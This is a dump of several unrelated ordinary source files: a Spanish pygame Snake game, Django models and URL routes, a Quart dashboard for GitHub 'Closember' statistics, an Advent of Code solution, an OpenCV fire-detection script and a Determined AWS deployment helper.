pygame.sprite.Sprite()\r\n auxiliar.rect = cabeza.image.get_rect()\r\n auxiliar.rect.left += cabeza.rect.left + coordenadaX\r\n auxiliar.rect.top += cabeza.rect.top + coordenadaY\r\n cuadroRojo = listaComida[0]\r\n if auxiliar.rect == cuadroRojo.rect:\r\n #Agregar un nuevo cuadro verde (nueva cabeza)\r\n nuevoVerde = pygame.sprite.Sprite()\r\n nuevoVerde.image = cabeza.image\r\n nuevoVerde.rect = cuadroRojo.rect\r\n listaSerpiente.insert(0, nuevoVerde)\r\n listaComida.remove(cuadroRojo)\r\n\r\n else: #No hay choque, movimiento normal\r\n cola = listaSerpiente[:][-1] #Último índice de los elementos\r\n cola.rect = auxiliar.rect\r\n listaSerpiente.pop() #Elimina la cola anterior\r\n listaSerpiente.insert(0, cola)\r\n\r\ndef actualizarSerpiente(listaSerpiente, imgSerpiente, colaC):\r\n Cola = pygame.sprite.Sprite()\r\n Cola.image = imgSerpiente\r\n Cola.rect = imgSerpiente.get_rect()\r\n Cola.rect.left = colaC.rect.left\r\n Cola.rect.top = colaC.rect.top\r\n listaSerpiente.insert(0,Cola)\r\n\r\n\r\ndef probarPerder(listaSerpiente):\r\n cabeza = listaSerpiente[0]\r\n if cabeza.rect.left < 0 or cabeza.rect.left > ANCHO:\r\n return True\r\n if cabeza.rect.top < 0 or cabeza.rect.top > 450:\r\n return True\r\n\r\ndef leerPuntuaciones(archivoTexto):\r\n entrada = open(archivoTexto, \"r\", encoding=\"UTF-8\")\r\n lista = []\r\n for linea in entrada:\r\n if linea == '\\n':\r\n pass\r\n else:\r\n lista.append(linea)\r\n entrada.close()\r\n return lista\r\n\r\ndef escribirPuntuaciones(archivoTexto, puntos):\r\n entrada = open(archivoTexto, \"w\", encoding=\"UTF-8\")\r\n entrada.write(str(puntos))\r\n entrada.close()\r\n\r\n\r\ndef dibujar():\r\n\r\n#Inicializa el motor de pygame\r\n pygame.init()\r\n #Crea una ventana de ANCHO x ALTO\r\n ventana = pygame.display.set_mode((ANCHO, ALTO)) # Crea la ventana donde dibujará\r\n reloj = pygame.time.Clock() # Para limitar los fps\r\n termina = False # Bandera para saber si termina la ejecución, iniciamos suponiendo que no\r\n\r\n #IMAGENES\r\n botonJugar = pygame.image.load(\"button_jugar.png\")\r\n botonPuntos = pygame.image.load(\"button_puntuaciones.png\")\r\n botonInfo = pygame.image.load(\"button_informacion.png\")\r\n botonMenu = pygame.image.load(\"button_menu.png\")\r\n botonMenuJuego = pygame.image.load(\"button_menu.png\")\r\n fondoMenu = pygame.image.load(\"FondoSnake.png\")\r\n fondo = pygame.image.load(\"Fondo.png\")\r\n\r\n #SPRITES\r\n imgSerpiente = pygame.image.load(\"cuboSerpiente.png\")\r\n Serpiente = pygame.sprite.Sprite()\r\n Serpiente.image = imgSerpiente\r\n Serpiente.rect = imgSerpiente.get_rect()\r\n Serpiente.rect.left = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750))\r\n Serpiente.rect.top = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450))\r\n\r\n imgComida = pygame.image.load(\"cuboComida.png\")\r\n Comida = pygame.sprite.Sprite()\r\n Comida.image = imgComida\r\n Comida.rect = imgComida.get_rect()\r\n Comida.rect.left = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750))\r\n Comida.rect.top = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450))\r\n\r\n #AUDIO\r\n pygame.mixer.init()\r\n pygame.mixer.music.load(\"MusicaJuego.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n #TEXTO\r\n fuente = pygame.font.SysFont(\"Showcard Gothic\", 25)\r\n\r\n #MOUSE\r\n xMouse = -1\r\n yMouse = -1\r\n\r\n #ESTADOS\r\n MENU = 1\r\n JUGANDO = 2\r\n PUNTUACION = 3\r\n INFORMACION = 4\r\n GANAR = 5\r\n PERDER = 6\r\n estado = MENU\r\n\r\n #LISTAS\r\n listaComida = [Comida]\r\n listaSerpiente = [Serpiente]\r\n\r\n puntos=0\r\n\r\n coorX = 50\r\n coorY = 0\r\n\r\n while not termina: #Ciclo principal, MIENTRAS la variable termina sea False, el ciclo se repite automáticamente\r\n # Procesa los eventos que recibe\r\n for evento in pygame.event.get():\r\n if evento.type == pygame.QUIT: #El usuario hizo click en el botón de salir\r\n termina = True #Queremos terminar el ciclo\r\n elif evento.type == pygame.MOUSEBUTTONDOWN:\r\n #Se oprimió el mouse\r\n xMouse, yMouse = pygame.mouse.get_pos()\r\n print(xMouse, yMouse)\r\n if estado == MENU:\r\n if xMouse>= 125 and xMouse<=325 and yMouse>=300 and yMouse<=350: #Muestra las coordenadas en las que se encuentra el botón\r\n #Se oprimió el botón de jugar, CAMBIAR ESTADO\r\n xMouse= -1\r\n estado = JUGANDO\r\n puntos = 0\r\n Serpiente.rect.left = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750))\r\n Serpiente.rect.top = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450))\r\n listaSerpiente = [Serpiente]\r\n listaComida = []\r\n crearComida(listaComida, imgComida)\r\n\r\n if xMouse>= 125 and xMouse<=330 and yMouse>=360 and yMouse<=410:\r\n #Se oprimió el botón de puntuaciones, CAMBIAR ESTADO\r\n xMouse= -1\r\n estado = PUNTUACION\r\n if xMouse>= 125 and xMouse<=325 and yMouse>=420 and yMouse<=470:\r\n #Se oprimió el botón de información, CAMBIAR ESTADO\r\n xMouse= -1\r\n estado = INFORMACION\r\n\r\n elif evento.type == pygame.KEYDOWN:\r\n if estado == JUGANDO: #Teclas que indican la dirección de la serpiente\r\n if evento.key == pygame.K_UP:\r\n coorX = 0\r\n coorY = -50\r\n #coordenadaY = (-50)\r\n #coordenadaX = 0\r\n #moverSerpiente(listaSerpiente,coordenadaX, coordenadaY, listaComida)\r\n elif evento.key == pygame.K_DOWN:\r\n coorX = 0\r\n coorY = 50\r\n #coordenadaY = 50\r\n #coordenadaX = 0\r\n #moverSerpiente(listaSerpiente, coordenadaX, coordenadaY, listaComida)\r\n elif evento.key == pygame.K_LEFT:\r\n coorX = -50\r\n coorY = 0\r\n #coordenadaY = 0\r\n #coordenadaX = -50\r\n #moverSerpiente(listaSerpiente, coordenadaX, coordenadaY, listaComida)\r\n elif evento.key == pygame.K_RIGHT:\r\n coorX = 50\r\n coorY = 0\r\n #coordenadaY = 0\r\n #coordenadaX = 50\r\n #moverSerpiente(listaSerpiente, coordenadaX, coordenadaY, listaComida)\r\n\r\n\r\n #Borrar pantalla\r\n ventana.fill(NEGRO)\r\n\r\n if estado == JUGANDO:\r\n if xMouse >= 675 and xMouse <= 775 and yMouse >= 525 and yMouse <= 575:\r\n # Se oprimió el botón de jugar, CAMBIAR ESTADO\r\n xMouse = -1\r\n estado = MENU\r\n\r\n moverSerpiente(listaSerpiente, coorX, coorY, listaComida)\r\n\r\n cuadricula(ventana)\r\n dibujarBotonMenuJugar(ventana, botonMenuJuego)\r\n dibujarSerpiente(ventana, listaSerpiente)\r\n dibujarComida(ventana, listaComida)\r\n dibujarMarcador(ventana, puntos, fuente)\r\n\r\n resultado = probarPerder(listaSerpiente)\r\n if resultado == True:\r\n archivoTexto = \"Puntuaciones.txt\"\r\n escribirPuntuaciones(archivoTexto, puntos)\r\n estado = PERDER\r\n\r\n if listaComida == []: #La lista queda vacía porque ya la serpiente ya se comió la comida\r\n colaC = listaSerpiente[len(listaSerpiente)-1]\r\n crearComida(listaComida, imgComida) #Se crea uno nuevo, ya sabe que se comió el anterior\r\n puntos += 1\r\n if puntos == 15:\r\n estado = GANAR\r\n\r\n\r\n if estado == GANAR:\r\n dibujarBotonMenuJugar(ventana, botonMenuJuego)\r\n archivoTexto = \"Puntuaciones.txt\"\r\n escribirPuntuaciones(archivoTexto, puntos)\r\n if xMouse >= 675 and xMouse <= 775 and yMouse >= 525 and yMouse <= 575:\r\n # Se oprimió el botón de jugar, CAMBIAR ESTADO\r\n xMouse = -1\r\n estado = MENU\r\n\r\n #dibujar el texto\r\n textoGanar1 = fuente.render(\"¡GANASTE!\", 1, AMARILLO)\r\n textoGanar2 = fuente.render(\"Lograste obtener 15 puntos\", 1, AMARILLO)\r\n textoGanar3 = fuente.render(\"Presiona el botón MENÚ para volver a jugar\", 1, AMARILLO)\r\n ventana.blit(textoGanar1, (60, 150))\r\n ventana.blit(textoGanar2, (60, 300))\r\n ventana.blit(textoGanar3, (60, 330))\r\n\r\n if estado == PERDER:\r\n dibujarBotonMenuJugar(ventana, botonMenuJuego)\r\n if xMouse >= 675 and xMouse <= 775 and yMouse >= 525 and yMouse <= 575:\r\n # Se oprimió el botón de jugar, CAMBIAR ESTADO\r\n xMouse = -1\r\n estado = MENU\r\n\r\n #dibujar el texto\r\n textoPerder1 = fuente.render(\"Has perdido\", 1, AZUL)\r\n textoPerder2 = fuente.render(\"Presiona el botón MENÚ para volver a jugar\", 1, AZUL)\r\n ventana.blit(textoPerder1, (60, 150))\r\n ventana.blit(textoPerder2, (60, 300))\r\n\r\n\r\n if estado == MENU:\r\n dibujarMouse(ventana, xMouse, yMouse)\r\n dibujarFondoMenu(ventana, fondoMenu)\r\n dibujarBotonJugar(ventana, botonJugar)\r\n dibujarBotonPuntuaciones(ventana,botonPuntos)\r\n dibujarBotonInfo(ventana,botonInfo)\r\n\r\n elif estado == PUNTUACION:\r\n dibujarFondo(ventana, fondo)\r\n dibujarBotonMenu(ventana, botonMenu)\r\n puntuaciones = leerPuntuaciones(\"Puntuaciones.txt\")\r\n registroPuntos = (puntuaciones[len(puntuaciones) - 1])\r\n print(puntuaciones)\r\n\r\n #dibujar el texto\r\n textoPuntuacion1 = fuente.render(\"PUNTUACIONES\", 1, ROJO)\r\n textoPuntuacion2 = fuente.render(\"La última puntuación lograda fue: \", 1, ROJO)\r\n textoPuntuacion3 = fuente.render(registroPuntos, 1, ROJO)\r\n ventana.blit(textoPuntuacion1, (300,100))\r\n ventana.blit(textoPuntuacion2, (100, 200))\r\n ventana.blit(textoPuntuacion3, (100, 250))\r\n if xMouse >= 625 and xMouse <= 725 and yMouse >= 465 and yMouse <= 515:\r\n # Se oprimió el botón de información, CAMBIAR ESTADO\r\n xMouse = -1\r\n estado = MENU\r\n\r\n elif estado == INFORMACION:\r\n dibujarFondo(ventana, fondo)\r\n dibujarBotonMenu(ventana, botonMenu)\r\n\r\n #dibujar el texto\r\n textoInfo1 = fuente.render(\"Fundamentos de programación: Proyecto Final \",1,NEGRO)\r\n textoInfo2 = fuente.render(\"Ivana Olvera Mérida A01746744\", 1, NEGRO)\r\n textoInfo3 = fuente.render(\"Instrucciones del juego\",1,NEGRO)\r\n textoInfo4 = fuente.render(\"El usuario se encarga de controlar una criatura\", 1, NEGRO)\r\n textoInfo5 = fuente.render(\"larga y delgada, similar a una serpiente, que se\",1,NEGRO)\r\n textoInfo6 = fuente.render(\"desplaza en un plano delimitado mientras recoge\",1,NEGRO)\r\n textoInfo7 = fuente.render(\"alimentos; debe evitar golpear alguna parte de\",1,NEGRO)\r\n textoInfo8 = fuente.render(\"las paredes que rodean el área sobre la cual se\",1,NEGRO)\r\n textoInfo9 = fuente.render(\"desplaza.\",1,NEGRO)\r\n ventana.blit(textoInfo1,(60,100))\r\n ventana.blit(textoInfo2,(60,150))\r\n ventana.blit(textoInfo3,(250,250))\r\n ventana.blit(textoInfo4,(60, 300))\r\n ventana.blit(textoInfo5,(60, 330))\r\n ventana.blit(textoInfo6,(60,360))\r\n ventana.blit(textoInfo7, (60, 390))\r\n ventana.blit(textoInfo8,(60, 420))\r\n ventana.blit(textoInfo9,(60,450))\r\n\r\n if xMouse >= 625 and xMouse <= 725 and yMouse >= 465 and yMouse <= 515:\r\n # Se oprimió el botón de información, CAMBIAR ESTADO\r\n xMouse = -1\r\n estado = MENU\r\n\r\n\r\n pygame.display.flip() # Actualiza trazos (Si no llamas a esta función, no se dibuja)\r\n reloj.tick(3) # 40 fps\r\n\r\n #Después del ciclo principal\r\n pygame.quit() #Termina pygame\r\n\r\n\r\n#Función principal, aquí resuelves el problema\r\ndef main():\r\n dibujar() #Por ahora, solo dibuja\r\n\r\nmain()\r\n\r\n","sub_path":"ProyectoFinal.py","file_name":"ProyectoFinal.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"275991782","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nfrom order.models import Order\n\n\nclass Ledger(models.Model):\n customer = models.ForeignKey(User, on_delete=models.CASCADE, related_name='ledgers')\n order = models.ForeignKey(Order, on_delete=models.CASCADE, null=True, related_name='order_ledgers')\n transaction_date = models.DateTimeField(auto_now_add=True)\n amount = models.FloatField(null=False)\n post_balance = models.FloatField(null=False)\n\n\nclass Invoice(models.Model):\n customer = models.ForeignKey(User, on_delete=models.CASCADE, related_name='invoices')\n order = models.OneToOneField(Order, on_delete=models.CASCADE, related_name='invoice')\n agent = models.ForeignKey(User, on_delete=models.CASCADE, related_name='agent_invoices')\n amount = models.FloatField(null=False)\n creation_date = models.DateTimeField(auto_now_add=True)\n updation_date = models.DateTimeField(auto_now=True)\n","sub_path":"dehaat/financialaccount/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"440235432","text":"import os\nimport humanize\nimport sys\nfrom quart_trio import QuartTrio\nimport os\nimport datetime\nimport trio\nimport asks\nfrom pathlib import Path\nPAT = os.environ['PAT']\n\nheaders = {\"Authorization\": f\"Bearer {PAT}\"}\n\nfrom cachetools.func import ttl_cache, TTLCache\n\nRC = TTLCache(1024, ttl=240)\n\n\nONGOING = datetime.datetime.now() > datetime.datetime(2021, 11, 1, 0, 0)\n\nif ONGOING:\n CUT_DATE = \"2021-11-01\"\nelse:\n CUT_DATE = \"2020-11-01\"\n\n\n# in https://docs.github.com/en/graphql/overview/explorer\n# trying to find oldest created issue.\nLONGEST_OPEN_QUERRY = (\n \"\"\"\n{\n search(query: \"topic:closember\", type: REPOSITORY, last: 100) {\n issueCount\n edges {\n node {\n ... on Repository {\n issues(first: 100, orderBy: {field: CREATED_AT, direction: ASC}, states: CLOSED, filterBy: {since:\\\"\"\"\"\n + CUT_DATE\n + \"\"\"T00:00:00Z\"}) {\n edges {\n node {\n closedAt\n url\n createdAt\n number\n }\n }\n }\n nameWithOwner\n }\n }\n }\n }\n rateLimit {\n limit\n cost\n remaining\n resetAt\n }\n}\n\"\"\"\n)\n\nprint(LONGEST_OPEN_QUERRY)\n\n\n# @ttl_cache( ttl=240)\nasync def run_query(\n query,\n): # A simple function to use requests.post to make the API call. Note the json= section.\n RC.expire()\n res = RC.get(query, None)\n if res is None:\n\n request = await asks.post(\n \"https://api.github.com/graphql\", json={\"query\": query}, headers=headers\n )\n if request.status_code == 200:\n res = request.json()\n RC[query] = res\n return res\n else:\n raise Exception(\n \"Query failed to run by returning code of {}. {}\".format(\n request.status_code, query\n )\n )\n else:\n return res\n\n \n\nSTARGAZERS = \"\"\"\n{\n repository(name: \"closember\", owner: \"openteamsinc\") {\n stargazers(last: 100) {\n totalCount\n edges {\n node {\n avatarUrl\n login\n url\n followers {\n totalCount\n }\n }\n }\n }\n }\n}\n\"\"\"\n\n# The GraphQL query (with a few aditional bits included) itself defined as a multi-line string.\n\nPARTICIP = \"\"\"\nquery TopicRepo {\n search(query: \"topic:closember\", type: REPOSITORY, first: 100) {\n edges {\n \n node {\n \t\t\t... on Repository {\n name\n owner{login}\n }\n }\n }\n }\n}\n\"\"\"\n\n\ndef query(slug):\n return (\n \"\"\"\n{\n search(query: \"repo:\"\"\"\n + slug\n + \"\"\" is:closed created:<\"\"\"\n + CUT_DATE\n + \"\"\" closed:>\"\"\"\n + CUT_DATE\n + \"\"\"\", type: ISSUE, last:100) {\n issueCount\n edges{\n node{\n __typename\n }\n }\n }\n rateLimit {\n limit\n cost\n remaining\n resetAt\n }\n}\n\"\"\"\n )\n\n\ndef query_open(slug, type_):\n res = (\n \"\"\"\n{\n search(query: \"repo:\"\"\"\n + slug\n + f\"\"\" is:open is:{type_}\",\"\"\"\n + \"\"\" type: ISSUE, last: 100) \n {\n issueCount\n }\n rateLimit {\n limit\n cost\n remaining\n resetAt\n }\n\n \n}\n\"\"\"\n )\n return res\n\n\n# result = run_query(query) # Execute the query\n# remaining_rate_limit = result[\"data\"][\"rateLimit\"][\"remaining\"] # Drill down the dictionary\n# print(\"Remaining rate limit - {}\".format(remaining_rate_limit))\n\nfrom jinja2 import Environment, FileSystemLoader, PackageLoader, select_autoescape\n\n\n# app = Flask(__name__)\napp = QuartTrio(__name__)\n\n\nslugs = [\n]\n\nfrom collections import Counter\n\n\nasync def get_p():\n data = await run_query(PARTICIP)\n data = data[\"data\"][\"search\"][\"edges\"]\n return [n[\"node\"][\"owner\"][\"login\"] + \"/\" + n[\"node\"][\"name\"] for n in data] + slugs\n\n\n@app.route(\"/\")\nasync def hello_world():\n return await render()\n\n\n@app.route(\"/hero.svg\")\nasync def hero():\n with open(\"hero.svg\") as f:\n return f.read()\n\n\nasync def get_longest_open():\n res = await run_query(LONGEST_OPEN_QUERRY)\n from dateutil.parser import isoparse\n from collections import namedtuple\n\n LongestClosed = namedtuple(\n \"LongestClosed\", \"delta,repo,url,open,closed,number\".split(\",\")\n )\n\n duration_pairs = []\n for repo in res[\"data\"][\"search\"][\"edges\"]:\n dpl = []\n reponame = repo[\"node\"][\"nameWithOwner\"]\n for issue in repo[\"node\"][\"issues\"][\"edges\"]:\n\n closed = isoparse(issue[\"node\"][\"closedAt\"])\n opened = isoparse(issue[\"node\"][\"createdAt\"])\n dpl.append(\n LongestClosed(\n closed - opened,\n reponame,\n issue[\"node\"][\"url\"],\n opened,\n closed,\n issue[\"node\"][\"number\"],\n )\n )\n if dpl:\n duration_pairs.append(list(sorted(dpl, reverse=True))[0])\n\n return list(sorted(duration_pairs, reverse=True))\n\n\nasync def render():\n\n env = Environment(\n loader=FileSystemLoader(os.path.dirname(__file__)),\n autoescape=select_autoescape([\"tpl\"]),\n extensions=[\"jinja_markdown.MarkdownExtension\"],\n )\n env.filters[\"naturaldelta\"] = humanize.naturaldelta\n tpl = env.get_template(\"page.tpl\")\n entries = {}\n remaining = {}\n rq = 5000\n\n reses1 = {}\n reses2 = {}\n reses3 = {}\n\n async def loc(storage, key, query):\n storage[key] = await run_query(query)\n\n async def get_sg(sgs):\n sgs.update(await run_query(STARGAZERS))\n\n print(\"Start contacting github...\")\n slgs = sorted(set(await get_p()))\n other = await get_longest_open()\n async with trio.open_nursery() as n:\n for s in slgs:\n n.start_soon(loc, reses1, s, query(s))\n n.start_soon(loc, reses2, s, query_open(s, \"pr\"))\n n.start_soon(loc, reses3, s, query_open(s, \"issue\"))\n sgs = {}\n n.start_soon(get_sg, sgs)\n print(\"Done\")\n\n all_sg = sgs[\"data\"][\"repository\"][\"stargazers\"]\n sg_total = all_sg[\"totalCount\"]\n top_sg = [\n {\n \"login\": x[\"node\"][\"login\"],\n \"avatar\": x[\"node\"][\"avatarUrl\"],\n \"url\": x[\"node\"][\"url\"],\n }\n for x in all_sg[\"edges\"]\n ]\n\n for s in slgs:\n # await loc(reses1, s, query(s))\n res1 = reses1[s]\n res2 = reses2[s]\n res3 = reses3[s]\n\n rq = min(rq, res1[\"data\"][\"rateLimit\"][\"remaining\"])\n\n search = res1[\"data\"][\"search\"]\n entries[s] = search[\"issueCount\"]\n c = Counter([s[\"node\"][\"__typename\"] for s in search[\"edges\"]])\n entries[s] = dict(c)\n\n rq = min(rq, res2[\"data\"][\"rateLimit\"][\"remaining\"])\n prs = res2[\"data\"][\"search\"][\"issueCount\"]\n\n rq = min(rq, res3[\"data\"][\"rateLimit\"][\"remaining\"])\n issues = res3[\"data\"][\"search\"][\"issueCount\"]\n\n remaining[s] = {\"Issue\": issues, \"PullRequest\": prs}\n\n rq = min(rq, res3[\"data\"][\"rateLimit\"][\"remaining\"])\n print(\"Rate limit:\", rq)\n\n print(\"rendering...\")\n entries = [(k, v) for k, v in entries.items()]\n remaining = [(k, v) for k, v in remaining.items()]\n\n total_closed = sum(\n [v[1].get(\"Issue\", 0) + v[1].get(\"PullRequest\", 0) for v in entries]\n )\n\n to_go = sum([v[1].get(\"Issue\", 0) + v[1].get(\"PullRequest\", 0) for v in remaining])\n\n entries = list(\n sorted(entries, key=lambda x: x[1].get(\"Issue\", 0) + x[1].get(\"PullRequest\", 0))\n )\n remaining = list(\n sorted(\n remaining, key=lambda x: x[1].get(\"Issue\", 0) + x[1].get(\"PullRequest\", 0)\n )\n )\n svg = Path(\"hero.svg\").read_text()\n res = tpl.render(\n entries=entries,\n rq=rq,\n remaining=remaining,\n total_closed=total_closed,\n to_go=to_go,\n other=other,\n CUT_DATE=CUT_DATE,\n ONGOING=ONGOING,\n NOW=datetime.datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"),\n sg_total=sg_total,\n top_sg=top_sg,\n svg=svg,\n )\n print(\"done\")\n return res\n\n\n@app.route(\"/\")\ndef addp(p):\n global slugs\n try:\n org,name = p.split('/')\n if org.isalnum() and name.isalnum():\n slugs.append(p)\n return 'ok'\n except Exception:\n return 'no'\n\n\ndef main():\n\n port = os.environ.get(\"PORT\", 5000)\n print(\"Seen config port \", port)\n prod = os.environ.get(\"PROD\", None)\n if prod:\n app.run(port=port, host=\"0.0.0.0\")\n else:\n app.run(port=port)\n\n\nif __name__ == \"__main__\":\n if \"static\" in sys.argv:\n build = Path(\"build\")\n build.mkdir(exist_ok=True)\n p = build / \"index.html\"\n p.write_text(trio.run(render))\n print(f\"written to {p}\")\n\n assets = Path(\"assets\")\n (build / \"assets\").mkdir(exist_ok=True)\n for img in assets.glob(\"*\"):\n (build / \"assets\" / img.name).write_bytes(img.read_bytes())\n\n else:\n main()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"356127807","text":"\"\"\"\nDefinition of urls for DjangoMovieReviewSite.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\nfrom django.contrib import admin\nimport app.forms\nimport app.views\nfrom django.urls import include, path\n\n\n# Uncomment the next lines to enable the admin:\n# from django.conf.urls import include\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = [\n # Examples:\n path('', app.views.home, name='home'),\n path('home/', app.views.home, name='home'),\n path('contact', app.views.contact, name='contact'),\n path('about', app.views.about, name='about'),\n path('movie//', app.views.movie, name='movie'),\n path('signup', app.views.signup, name='signup'), \n path('login',\n django.contrib.auth.views.LoginView.as_view(),\n {\n 'template_name': 'app/login.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title': 'Log in',\n 'year': datetime.now().year,\n }\n },\n name='login'),\n path('logout',\n django.contrib.auth.views.LogoutView.as_view(),\n {\n 'next_page': '/',\n },\n name='logout'),\n path('accounts/', include('django.contrib.auth.urls')),\n\n]\n\nurlpatterns = urlpatterns + [\n path('admin/', admin.site.urls),\n path('accounts/', include('django.contrib.auth.urls')),\n path('search_results//', app.views.search_results, name='search_results'),\n path('add_review//', app.views.add_review, name='add_review'),\n path('view_review//', app.views.view_review, name='view_review'),\n path('user//', app.views.user, name=\"user\"),\n path('reviews/', app.views.reviews, name=\"reviews\")\n]\n","sub_path":"DjangoMovieReviewSite/DjangoMovieReviewSite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"388765050","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nfrom datetime import datetime\nfrom keras.models import load_model\n\ndef preprocess_input_data(img):\n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n img_gray = (255 - img_gray)\n img_gray = cv2.cvtColor(img_gray, cv2.COLOR_GRAY2RGB)\n return img_gray\n\n\ndef get_model(path):\n return load_model(path)\n\n\ndef get_photo_annotation(img, fire_presence=f'FIRE DETECTED', position=(10, 50), color=(0, 0, 255, 0)):\n image_text = fire_presence + datetime.now().strftime(\"%h-%m-%s\")\n return cv2.putText(img, image_text, position, cv2.FONT_HERSHEY_SIMPLEX, 1, color, 3)\n\n\ndef distance(height_tree_px, focal_lenght=0.00444, tree_height=37):\n height_object_px = height_tree_px\n image_size = [1280, 720] # пиксели\n matrix_size = [5.1, 3.8] # миллиметры\n\n focus = focal_lenght\n height_object = tree_height\n height_on_matrix = (matrix_size[0] / 1000) / image_size[0] * height_object_px\n\n distance = (focus * height_object) / height_on_matrix\n return round(distance)\n\n\ndef video_analyze(video_path, model_path):\n model = get_model(model_path)\n\n cap = cv2.VideoCapture(video_path)\n\n if not cap.isOpened():\n print('Cannot to open video file')\n\n while cap.isOpened():\n fl, img_frame = cap.read()\n if img_frame is None:\n break\n\n image = Image.fromarray(img_frame.astype('uint8'), 'RGB').resize((320, 320))\n\n image = np.asarray(image)\n image = preprocess_input_data(image)\n image = np.expand_dims(image, axis=0)\n\n model_predicts = np.argmax(model.predict(image))\n\n if model_predicts == 0:\n get_photo_annotation(image)\n print(image.shape)\n\n distance_to_fire = distance(14) # количество пикселей, занимаемое дымом или огнем на изображении\n print(distance_to_fire)\n '''\n Сделать реализацию какого то PUSH уведомления, если модель отвечает нулем.\n Если получить больше данных, можно обучить сегментатор, с помощью которого можно наиболее точно определять\n расстояние до пожара и примерную площадь очага возгарания.\n '''\n\n\nif __name__=='__main__':\n video_analyze(video_path='', model_path='')","sub_path":"app/api_cv.py","file_name":"api_cv.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"208401215","text":"def trees(landscape, right, down):\n r = right\n d = down\n tree_count = 0\n while d < len(landscape):\n t = landscape[d][r % len(landscape[d])]\n \n if t == '.':\n t = t\n elif t == '#':\n tree_count += 1\n else:\n print(\"No good! Saw char {}\".format(t))\n print (\"{}, {}, {}, {}\".format(d, r % (len(landscape[d])), t, tree_count ))\n d += down\n r += right\n return tree_count\n\nlandscape = []\n\nwith open(\"input\") as f:\n for l in f:\n landscape.append([])\n for c in l:\n if c != \"\\n\" and c != \"\\r\":\n landscape[-1].append(c)\n\nprint(trees(landscape, 3, 1))\n","sub_path":"2020/day/3/part/1/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448292435","text":"import abc\nfrom typing import Any, Dict, Iterable, List, Optional\n\nimport pkg_resources\nfrom termcolor import colored\n\nimport determined\nimport determined.deploy\nfrom determined.deploy.aws import constants\n\n\nclass DeterminedDeployment(metaclass=abc.ABCMeta):\n template_parameter_keys = [] # type: List[str]\n template = None # type: Optional[str]\n\n master_info = \"Configure the Determined CLI: \" + colored(\n \"export DET_MASTER={master_ip}\", \"yellow\"\n )\n ui_info = \"View the Determined UI: \" + colored(\"http://{master_ip}:8080\", \"blue\")\n logs_info = \"View Logs at: \" + colored(\n \"https://{region}.console.aws.amazon.com/cloudwatch/home?\"\n \"region={region}#logStream:group={log_group}\",\n \"blue\",\n )\n ssh_info = \"SSH to master Instance: \" + colored(\n \"ssh -i ubuntu@{master_ip}\", \"yellow\"\n )\n\n def __init__(self, parameters: Dict[str, Any]) -> None:\n assert self.template is not None\n self.template_path = pkg_resources.resource_filename(\n constants.misc.TEMPLATE_PATH, self.template\n )\n self.parameters = parameters\n\n @abc.abstractmethod\n def deploy(self) -> None:\n pass\n\n def print(self) -> None:\n with open(self.template_path) as f:\n print(f.read())\n\n def consolidate_parameters(self) -> List[Dict[str, Any]]:\n return [\n {\"ParameterKey\": k, \"ParameterValue\": str(self.parameters[k])}\n for k in self.parameters.keys()\n if self.parameters[k] and k in self.template_parameter_keys\n ]\n\n def before_deploy_print(self) -> None:\n cluster_id = self.parameters[constants.cloudformation.CLUSTER_ID]\n aws_region = self.parameters[constants.cloudformation.BOTO3_SESSION].region_name\n version = (\n self.parameters[constants.cloudformation.VERSION]\n if self.parameters[constants.cloudformation.VERSION]\n else determined.__version__\n )\n keypair = self.parameters[constants.cloudformation.KEYPAIR]\n\n print(f\"Determined Version: {version}\")\n print(f\"Stack Name: {cluster_id}\")\n print(f\"AWS Region: {aws_region}\")\n print(f\"Keypair: {keypair}\")\n\n @property\n def info_partials(self) -> Iterable[str]:\n return (\n self.master_info,\n self.ui_info,\n self.logs_info,\n self.ssh_info,\n )\n\n def print_output_info(self, **kwargs: str) -> None:\n print(\"\\n\".join(self.info_partials).format(**kwargs))\n","sub_path":"harness/determined/deploy/aws/deployment_types/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"75650401","text":"from keras.models import Sequential, load_model\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.utils import np_utils\nimport keras, sys\nimport numpy as np\nfrom PIL import Image\n\n\nclasses = [\"monkey\", \"cat\", \"dog\"]\nnum_classes = len(classes)\nimage_size = 50, 50\n\ndef build_model():\n model = Sequential()\n model.add(Conv2D(32,(3,3), padding='same', input_shape=(50,50,3)))\n model.add(Activation('relu'))\n model.add(Conv2D(32,(3,3)))\n 